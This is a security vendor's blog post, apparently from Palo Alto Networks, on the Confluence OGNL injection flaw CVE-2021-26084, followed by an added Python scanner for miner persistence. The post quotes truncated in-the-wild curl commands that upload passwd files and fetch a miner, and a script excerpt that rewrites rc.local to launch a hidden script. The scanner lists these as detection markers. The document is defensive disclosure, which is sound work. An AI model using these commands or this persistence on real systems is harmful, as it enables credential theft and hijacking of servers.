




Recently, a new OGNL (Object-Graph Navigation Language) expression injection vulnerability was discovered in the Atlassian Confluence framework. OGNL expression evaluation can lead to arbitrary code execution, as was seen in the past with a similar Apache Struts vulnerability (CVE-2019-0230), and this case is no different.

To protect Linux hosts, Cortex XDR added a dedicated module to detect and prevent Java deserialization vulnerabilities and vulnerabilities such as those that allow one to inject OGNL expressions, in Cortex XDR agent 7.0 and higher running under Linux. This module has successfully blocked numerous attacks targeting customers' endpoints.

A few examples that we saw of prevented real-life, in-the-wild attacks:

1- Attempts to upload the customer's passwd files:

    curl -X POST --data-binary

2- Attempts to directly execute a script that downloads a miner:

    (curl -fsSL -q -O -

An excerpt from the downloaded script:

    if ! grep rsyslogds.sh /etc/rc.d/rc.local >/dev/null; then
        echo " Adding $HOME/c3pool/miner.sh script to /etc/rc.d/rc.local"
        echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >/etc/rc.d/rc.local
    else
        echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi

3- Interactive reverse shell on the machine.

Without requiring any additional user input, starting from content version 196-69754, Cortex XDR on Linux automatically blocked all these attacks, maintaining the integrity and confidentiality of the vulnerable servers.

Because Palo Alto Networks' attack surface management solution Cortex Xpanse regularly scans the entire internet for known and emerging vulnerabilities, we were able to quickly identify organizations exposed to this vulnerability. Cortex Xpanse also identified a rapid decrease in Atlassian Confluence servers vulnerable to CVE-2021-26084.

Fig 1: Number of vulnerable Atlassian Confluence servers on the internet, which starts decreasing after the announcement of the CVE

Our preliminary research found over 40 educational institutions and over 90 state and local governments with potential exposure to this CVE. Some organizations respond well to this vulnerability, but others are likely unable to identify all of their exposed servers and take them down. A continuous and updated view of an attack surface can help organizations in their rapid response to new CVEs. The 2021 Cortex Xpanse Attack Surface Threat Report found that malicious actors start scanning within 15 minutes following CVE disclosures. In contrast, on average, organizations need 12 hours to see vulnerable systems, which assumes the enterprise knows about all assets on its network.

While Cortex XDR on Linux can block this exploit, Palo Alto Networks recommends that customers upgrade and patch vulnerable versions of Atlassian Confluence, as a best practice to secure their systems.
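The miner script excerpt quoted above persists by writing a launcher for a hidden script (/usr/sbin/.rsyslogds.sh) into /etc/rc.d/rc.local (note that it overwrites the file with ">" rather than appending, which itself is a visible side effect) and reports whether $HOME/c3pool/miner.sh is already referenced from $HOME/.profile. The following added example, written for this page and not code from Palo Alto Networks or the post, turns those indicators into a small host check a responder could run against startup files: it flags the two marker strings taken from the excerpt and, more generally, any dot-prefixed script under /usr/bin or /usr/sbin launched with its output silenced. The file contents embedded below are constructed for the demonstration; the marker strings and the heuristic are assumptions about what a compromised host looks like based only on the excerpt.

```python
"""Scan Linux startup files for the miner persistence indicators quoted in the post.

Added example for this page; not Palo Alto Networks code. Marker strings are taken
from the quoted script excerpt; the sample file contents are constructed.
"""
from __future__ import annotations

import os
import re
from dataclasses import dataclass

# Indicator strings lifted from the script excerpt in the post.
KNOWN_MINER_MARKERS = (
    "rsyslogds.sh",      # launcher the script writes into /etc/rc.d/rc.local
    "c3pool/miner.sh",   # miner path the script expects under $HOME
)

# Generic heuristic (assumption): a hidden, dot-prefixed script under a system
# binary directory, run with all output discarded, is unusual in a genuine rc.local.
HIDDEN_SYSTEM_SCRIPT = re.compile(r"/usr/s?bin/\.[\w.-]+")
SILENCED_OUTPUT = re.compile(r">\s*/dev/null\s+2>&1")


@dataclass
class Finding:
    path: str
    lineno: int
    reason: str
    line: str


def scan_startup_file(path: str, content: str) -> list[Finding]:
    """Return one Finding per suspicious non-comment line in a startup file."""
    findings: list[Finding] = []
    for lineno, raw in enumerate(content.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for marker in KNOWN_MINER_MARKERS:
            if marker in line:
                findings.append(Finding(path, lineno, f"known miner marker: {marker}", line))
                break
        else:
            if HIDDEN_SYSTEM_SCRIPT.search(line) and SILENCED_OUTPUT.search(line):
                findings.append(Finding(path, lineno,
                                        "hidden script in system dir with silenced output", line))
    return findings


def scan_contents(files: dict[str, str]) -> list[Finding]:
    """Scan an in-memory mapping of path -> content (used for the demo and tests)."""
    out: list[Finding] = []
    for path, content in files.items():
        out.extend(scan_startup_file(path, content))
    return out


def scan_paths(paths: list[str]) -> list[Finding]:
    """Scan real files on the host, silently skipping ones that do not exist."""
    contents = {}
    for p in paths:
        if os.path.isfile(p):
            with open(p, encoding="utf-8", errors="replace") as fh:
                contents[p] = fh.read()
    return scan_contents(contents)


# Constructed sample contents mimicking what the quoted script leaves behind.
SAMPLE_RC_LOCAL = """#!/bin/sh
# rc.local (constructed sample)
/usr/sbin/.rsyslogds.sh >/dev/null 2>&1
exit 0
"""
SAMPLE_PROFILE = """# ~/.profile (constructed sample)
export PATH="$HOME/bin:$PATH"
$HOME/c3pool/miner.sh >/dev/null 2>&1 &
"""
SAMPLE_CLEAN = """#!/bin/sh
/usr/sbin/sshd
exit 0
"""

if __name__ == "__main__":
    demo = {"/etc/rc.d/rc.local": SAMPLE_RC_LOCAL,
            "/root/.profile": SAMPLE_PROFILE,
            "/etc/rc.local.clean": SAMPLE_CLEAN}
    for f in scan_contents(demo):
        print(f"{f.path}:{f.lineno}: {f.reason}: {f.line}")
    # On a live host you would instead call, for example:
    # scan_paths(["/etc/rc.d/rc.local", "/etc/rc.local", os.path.expanduser("~/.profile")])
```

The marker list is deliberately short and specific to this excerpt; the heuristic branch is what catches a renamed variant, at the cost of occasional false positives that an analyst should review rather than auto-remediate.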
